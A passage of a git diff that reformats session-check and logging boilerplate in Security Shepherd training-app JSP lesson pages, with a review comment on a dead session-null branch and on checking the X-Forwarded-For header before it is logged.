- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
- //Is the user signed in?
- boolean bankSessionDetected = false;
- String currentBankAccountNumber = new String();
- if (ses.getAttribute("directObjectBankAccount") != null) {
- currentBankAccountNumber = ses.getAttribute("directObjectBankAccount").toString();
- bankSessionDetected = true;
- }
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ //Is the user signed in?
+ boolean bankSessionDetected = false;
+ String currentBankAccountNumber = new String();
+ if(ses.getAttribute("directObjectBankAccount") != null)
+ {
+ currentBankAccountNumber = ses.getAttribute("directObjectBankAccount").toString();
+ bankSessionDetected = true;
+ }
%>
-
- Security Shepherd - <%= levelName %>
-
-
+
+Security Shepherd - <%= levelName %>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
-
+/**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
+
//No Quotes In level Name
- String levelName = "SQL Injection 4";
+String levelName = "SQL Injection 4";
//Alphanumeric Only
- String levelHash = "1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629";
+String levelHash = "1feccf2205b4c5ddf743630b46aece3784d61adc56498f7603ccd7cb8ae92629";
//Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
//Used more than once translations
- String i18nLevelName = bundle.getString("challenge.challengeName");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+String i18nLevelName = bundle.getString("challenge.challengeName");
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
%>
-
- Security Shepherd - <%= i18nLevelName %>
-
-
+
+Security Shepherd - <%= i18nLevelName %>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
- //No Quotes In level Name
- String levelName = "Poor Validation 2";
- //Alphanumeric Only
- String levelHash = "20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5";
+ /**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
+ //No Quotes In level Name
+ String levelName = "Poor Validation 2";
+ //Alphanumeric Only
+ String levelHash = "20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5";
- //Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.poorValidation.poorValidationStrings",
- locale);
- //Used more than once translations
- String i18nLevelName = bundle.getString("poorValidation.2.challengeName");
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.poorValidation.poorValidationStrings",
+ locale);
+ //Used more than once translations
+ String i18nLevelName = bundle.getString("poorValidation.2.challengeName");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
- levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
- levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
- levelName + " has been accessed by " + ses.getAttribute("userName").toString(),
- ses.getAttribute("userName"));
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+ levelName + " Accessed");
+ if (request.getSession() != null) {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try {
+ tokenCookie = Validate.getToken(request.getCookies());
+ } catch (Exception htmlE) {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+ levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null) {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+ levelName + " has been accessed by " + ses.getAttribute("userName").toString(),
+ ses.getAttribute("userName"));
%>
-
- Security Shepherd - <%=i18nLevelName%>
-
-
+
+Security Shepherd - <%=i18nLevelName%>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Sean Duggan
- */
-
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
- // Getting Session Variables
- //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
- String csrfToken = Encode.forHtml(tokenCookie.getValue());
+ //No Quotes In level Name
+ String levelName = "What is Mobile Reverse Engineering?";
+ //Alphanumeric Only
+ String levelHash = "19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9";
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_reverse_engineering." + levelHash, locale);
+ ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.m_reverse_engineering");
+ /**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Sean Duggan
+ */
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ // Getting Session Variables
+ //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+
+ String csrfToken = Encode.forHtml(tokenCookie.getValue());
+
%>
-
- Security Shepherd - <%=translatedLevelName%>
-
-
+
+Security Shepherd - <%=translatedLevelName%>
+
-
-
-
-
-
<%
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
+ }
+ else
+ {
+ response.sendRedirect("../loggedOutSheep.html");
+ }
+ }
+ else
+ {
+ response.sendRedirect("../loggedOutSheep.html");
+ }
%>
diff --git a/src/main/webapp/lessons/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.jsp b/src/main/webapp/lessons/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.jsp
index 9f63612cf..a55897351 100644
--- a/src/main/webapp/lessons/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.jsp
+++ b/src/main/webapp/lessons/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.jsp
@@ -1,137 +1,136 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+ language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
<%
- //No Quotes In level Name
- String levelName = "What is Mobile Unintended Data Leakage?";
- //Alphanumeric Only
- String levelHash = "392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec";
- //Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_unintended_data_leakage." + levelHash, locale);
- ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
- //Used more than once translations
- String translatedLevelName = bundle.getString("title.question.m_uninteded_data_leakage");
+ //No Quotes In level Name
+ String levelName = "What is Mobile Unintended Data Leakage?";
+ //Alphanumeric Only
+ String levelHash = "392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec";
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_unintended_data_leakage." + levelHash, locale);
+ ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.m_uninteded_data_leakage");
+
+ /**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Sean Duggan
+ */
- /**
- *
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Sean Duggan
- */
-
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
%>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
<%
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
+ }
+ else
+ {
+ response.sendRedirect("../loggedOutSheep.html");
+ }
+}
+else
+{
+ response.sendRedirect("../loggedOutSheep.html");
+}
%>
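Review bot: The reformatted guard `if (request.getSession() != null)` can never fail, because `HttpServletRequest.getSession()` creates a session when none exists. The outer `else` with `response.sendRedirect("../loggedOutSheep.html")` is therefore unreachable, and the page is gated only by `Validate.validateSession(ses) && tokenCookie != null`. If the intent is to turn away requests that arrive without a session, use `HttpSession ses = request.getSession(false); if (ses != null)`, and stop the earlier `Validate.validateLanguage(request.getSession())` call and the JSP's implicit session (`session="false"` in the page directive) from creating one; otherwise drop the dead branch. Separately, `request.getHeader("X-Forwarded-For")` is client-supplied and is passed straight to `ShepherdLogManager.logEvent`, which is not visible here, so confirm that it neutralises CR/LF before the value reaches the log. The same block recurs in the other lesson and challenge JSP hunks on this page, including `4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.jsp` and `77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.jsp`.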
diff --git a/src/main/webapp/lessons/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.jsp b/src/main/webapp/lessons/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.jsp
index 021ca7a7a..d8cf901c8 100644
--- a/src/main/webapp/lessons/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.jsp
+++ b/src/main/webapp/lessons/4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39.jsp
@@ -1,125 +1,132 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+ language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
<%
+
+ //No Quotes In level Name
+ String levelName = "Content Provider Leakage Lesson";
+ //Alphanumeric Only
+ String levelHash = "4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39";
+
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_content_provider_leakage." + levelHash, locale);
+ ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.content_provider_leak");
- //No Quotes In level Name
- String levelName = "Content Provider Leakage Lesson";
- //Alphanumeric Only
- String levelHash = "4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39";
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
- //Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_content_provider_leakage." + levelHash, locale);
- ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
- //Used more than once translations
- String translatedLevelName = bundle.getString("title.question.content_provider_leak");
-
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-
- /*
- *
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Sean Duggan
- */
+ /*
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Sean Duggan
+ */
%>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
+ /**
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
- final String LEVEL_NAME = "Poor Data Validation";
- final String LEVEL_HASH = "4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f";
+ final String LEVEL_NAME = "Poor Data Validation";
+ final String LEVEL_HASH = "4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f";
- //Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.poor_data_validation." + LEVEL_HASH, locale);
- //Used more than once translations
- String translatedLevelName = bundle.getString("title.question.poor_data_validation");
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.poor_data_validation." + LEVEL_HASH, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.poor_data_validation");
- ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
- String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
- String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
- String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.otg.buslogic.001");
+ ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+ String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
+ String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+ String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.otg.buslogic.001");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-%>
+ %>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
-
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+ <% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+ <% } %>
<%
diff --git a/src/main/webapp/lessons/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.jsp b/src/main/webapp/lessons/77777b312d5b56a17c1f30550dd34e8d6bd8b037f05341e64e94f5411c10ac8e.jsp
index fe08cf362..a1d89d65f 100644
